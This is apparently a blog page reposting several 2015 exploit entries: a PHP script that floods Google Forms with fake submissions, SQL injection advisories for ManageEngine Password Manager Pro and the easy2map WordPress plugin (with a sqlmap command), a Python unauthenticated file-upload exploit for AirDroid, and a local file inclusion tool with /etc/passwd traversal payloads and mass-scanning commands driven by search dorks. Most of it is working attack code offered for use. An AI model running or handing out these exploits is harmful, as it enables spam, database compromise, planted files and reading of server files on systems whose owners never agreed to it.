-
7 Temmuz 2015 Salı
google forms csrf bypass data flooding



# Exploit Title: csrf google forms data flooding 

# Date: 29-6-2015

# Exploit Author: alqnas eslam

# Vendor Homepage:fb.com/alqnas4

# Software Link: https://docs.google.com

# Tested on:windows or linux

========================================================

description:

google not set token in the forms 

so attacker can send data flooding in forms

========================================================

Setps:

1- open any form in google forms

2- get inputs name and action you can use (burp suite)

3- edit my code php and put in it inputs name and action and number you want send data

4- run code in any server 

==========================================================

poc:


<?php
$i =1;
function post_to_url($url, $data) {
$fields = '';
foreach($data as $key => $value) {
$fields .= $key . '=' . $value . '&';
}
rtrim($fields, '&');
ini_set('max_execution_time', 50000);
$post = curl_init();
curl_setopt($post, CURLOPT_URL, $url);
curl_setopt($post, CURLOPT_POST, count($data));
curl_setopt($post, CURLOPT_POSTFIELDS, $fields);
curl_setopt($post, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($post);
}
//number of data will be send 10
while ( $i <=10 ){
$data = array(
// inputs name //inputs value
"entry.1749181457" => "test alqnas eslam",
"entry.1360610555" => "01119032582",
"entry.660237368" => "info test",
"entry.319716724" => "alqnast@yahoo.com",
"entry.1363501645" => "19",
"draftResponse" =>"",
"pageHistory" =>"0",
"fbzx"=> "-2167671423753092324"
);
//action of form
post_to_url("https://docs.google.com/forms/action", $data);
$i++;
}
?>
======================================================================
the result after you run code 
http://cdn.top4top.net/i_128f910c611.jpg
======================================================================
explane poc video in youtube
http://youtu.be/kHJi_8UNjxw
DEVAMINI OKU..
ManageEngine Password Manager Pro 8.1 SQL Injection



Title: ManageEngine Password Manager Pro SQL 8.1 Injection vulnerability
Author: Blazej Adamczyk (br0x)
Date: 2015-06-30
Download site: https://www.manageengine.com/products/passwordmanagerpro/download.html
Version: 8.1 and below
Vendor: https://www.manageengine.com/products/passwordmanagerpro/
Vendor Notified: 2015-06-30
Vendor Contact: passwordmanagerpro-support@manageengine.com

Description:
An authenticated user (even the guest user) is able to execute arbitrary SQL code using a forged request to the SQLAdvancedALSearchResult.cc.
The SQL query is build manually and is not escaped properly in the AdvanceSearch.class of AdventNetPassTrix.jar.

Details:
The problem is with escaping the operator when more then one condition is specified in the advanced search. The broken url:
https://localhost:7272/STATE_ID/1425543888647/SQLAdvancedALSearchResult.cc?ANDOR=***HERE_INJECT***&condition_1=Ptrx_Resource@RESOURCENAME&operator_1=CONTAINS&value_1=asd&condition_2=Ptrx_Resource@RESOURCENAME&operator_2=CONTAINS&value_2=asd2&FLAG=TRUE&COUNT=2&USERID=***USERID***&ADVSEARCH=true&SUBREQUEST=XMLHTTP


--
Regards,
Blazej Adamczyk
blazej.adamczyk@gmail.com
PGP: 0x7423F7B7 (pgp.mit.edu)
Fingerprint=CBAF 608A E20B 06F2 C172 A853 B70E 6F79 7423 F7B7
DEVAMINI OKU..
AirDroid Unauthenticated Arbitrary File Upload




#/IN THE NAME OF GOD
#/auth====PARSA ADIB

import sys,requests,re,urllib2
def logo():
print"\t\t .__ .___ .__ .___"
print"\t\t_____ |__|______ __| _/______ ____ |__| __| _/"
print"\t\t\__ \ | \_ __ \/ __ |\_ __ \/ _ \| |/ __ | "
print"\t\t / __ \| || | \/ /_/ | | | \( <_> ) / /_/ | "
print"\t\t(____ /__||__| \____ | |__| \____/|__\____ | "
print"\t\t \/ \/ \/ "
print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib"
if len(sys.argv)<6 or len(sys.argv)>6 :
logo()
print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path"
print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard"
else :
logo()
print "\n[+]Reciving Details\n-----------------------------"
try : 
p = requests.get('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/ping/') 
except IOError :
print "\n[!] Check If server is Running"
sys.exit()
for i in p.content.split(',') :
for char in '{"}_': 
i = i.replace(char,'').upper()
print "[*]"+i+""
print "\n[+]Sending File\n-----------------------------"
try : 
r = requests.post('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/upload/dir?fn='+sys.argv[3]+'&d='+sys.argv[5]+'&after=1&fname='+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], 'rb').read()})
if (r.status_code == 200) :
print "[*]RESPONSE:200"
print "[*]FILE SENT SUCCESSFULY"
except IOError :
print "\n[!] Error"

DEVAMINI OKU..
WordPress easy2map 1.24 SQL Injection




itle: SQL Injection in easy2map wordpress plugin v1.24
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.25
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=131
Description: The easiest tool available for creating custom & great-looking Google Maps. Add multiple pins and customize maps with drag-and-drop simplicity.
Vulnerability:
The following lines in Function.php use sprintf() to format queries being sent to the database, this doesn't provide proper sanitization of user input or
properly parameterize the query to the database.

90 $wpdb->query(sprintf("UPDATE $mapsTable
91 SET PolyLines = '%s'
92 WHERE ID = '%s';", $PolyLines, $mapID));

.
.
.
163 $wpdb->query(sprintf("
164 UPDATE $mapsTable
165 SET TemplateID = '%s',
166 MapName = '%s',
167 Settings = '%s',
168 LastInvoked = CURRENT_TIMESTAMP,
169 CSSValues = '%s',
170 CSSValuesList = '%s',
171 CSSValuesHeading = '%s',
172 MapHTML = '%s',
173 IsActive = 1,
174 ThemeID = '%s'
175 WHERE ID = %s;",
176 $Items['mapTemplateName'],
177 $Items['mapName'],
178 urldecode($Items['mapSettingsXML']),
179 urldecode($Items["mapCSSXML"]),
180 urldecode($Items["listCSSXML"]),
181 urldecode($Items["headingCSSXML"]),
182 urldecode($Items["mapHTML"]),
183 $Items['mapThemeName'],
184 $mapID));
185 } else {
186 
187 //this is a map insert
188 if (!$wpdb->query(sprintf("
189 INSERT INTO $mapsTable(
190 TemplateID,
191 MapName,
192 DefaultPinImage,
193 Settings,
194 LastInvoked,
195 PolyLines,
196 CSSValues,
197 CSSValuesList,
198 CSSValuesHeading,
199 MapHTML,
200 IsActive,
201 ThemeID
202 ) VALUES ('%s', '%s', '%s', '%s', 
203 CURRENT_TIMESTAMP, '%s', '%s', '%s', '%s', '%s', 0, '%s');",
204 $Items['mapTemplateName'],
205 $Items['mapName'], str_replace('index.php', '', easy2map_get_plugin_url('/index.php')) . "images/map_pins/pins/111.png",
206 urldecode($Items['mapSettingsXML']), '',
207 urldecode($Items["mapCSSXML"]),
208 urldecode($Items["listCSSXML"]),
209 urldecode($Items["headingCSSXML"]),
210 urldecode($Items["mapHTML"]),
211 $Items['mapThemeName']))) 
.
.
267 $wpdb->query(sprintf("
268 UPDATE $mapsTable
269 SET MapName = '%s',
270 LastInvoked = CURRENT_TIMESTAMP,
271 IsActive = 1
272 WHERE ID = %s;", $mapName, $mapID));

In MapPinImageSave.php, code isn’t sanitized when creating a directory allowing ../ to create files outside of intended directory:

4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/";
.
.
11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) {
12 
13 if (!file_exists($imagesDirectory)) {
14 mkdir($imagesDirectory);
15 }

CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug)
OSVDB:
Exploit Code:
• $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3
DEVAMINI OKU..
Tool lfiINURL - exploring Local File Inclusion 




http://target.br/file.php?open=/etc/passwd
http://target.br/file.php?open=../etc/passwd
http://target.br/file.php?open=../../etc/passwd
http://target.br/file.php?open=../../../etc/passwd
http://target.br/file.php?open=../../../../etc/passwd

AUTOR:        Cleiton Pinheiro / Nick: googleINURL
EMAIL:        inurlbr@gmail.com
Blog:         http://blog.inurl.com.br
Twitter:      https://twitter.com/googleinurl
Fanpage:      https://fb.com/InurlBrasil
Pastebin      http://pastebin.com/u/Googleinurl
GIT:          https://github.com/googleinurl
PSS:          http://packetstormsecurity.com/user/googleinurl
EXA:          http://exploit4arab.net/author/248/Cleiton_Pinheiro
YOUTUBE:      http://youtube.com/c/INURLBrasil
PLUS:         http://google.com/+INURLBrasil
Vulnerability Description

Local File Inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts,we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

In successful cases If the above mentioned conditions are met, an attacker would see something like the following:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alex:x:500:500:alex:/home/alex:/bin/bash
margo:x:501:501::/home/margo:/bin/bash

Download tool lfiINURL
https://github.com/googleinurl/lfiINURL

COMMAND EXPLOIT --help

   -t : SET TARGET.
   -c : COUNT DIR.
        ex: -c   3 = /etc/passwd, ../etc/passwd, ../../etc/passwd ...
   Execute:
              php lfiINURL.php -t target.br/index.file?= -c 50

Demonstration execution
Demonstration execution

USE SCANNER INURLBR MASS EXPLOIT COMMAND EXEMPLE
Download scanner inurlbr 1.0
https://github.com/googleinurl/SCANNER-INURLBR
inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&index.p=" &&php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'include=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&include=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'

inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'

# OBS USE UNIX
Demonstration execution xpl + inurlbr


Demonstration execution xpl + inurlbr
DEVAMINI OKU..
Kaydol: Yorumlar ( Atom )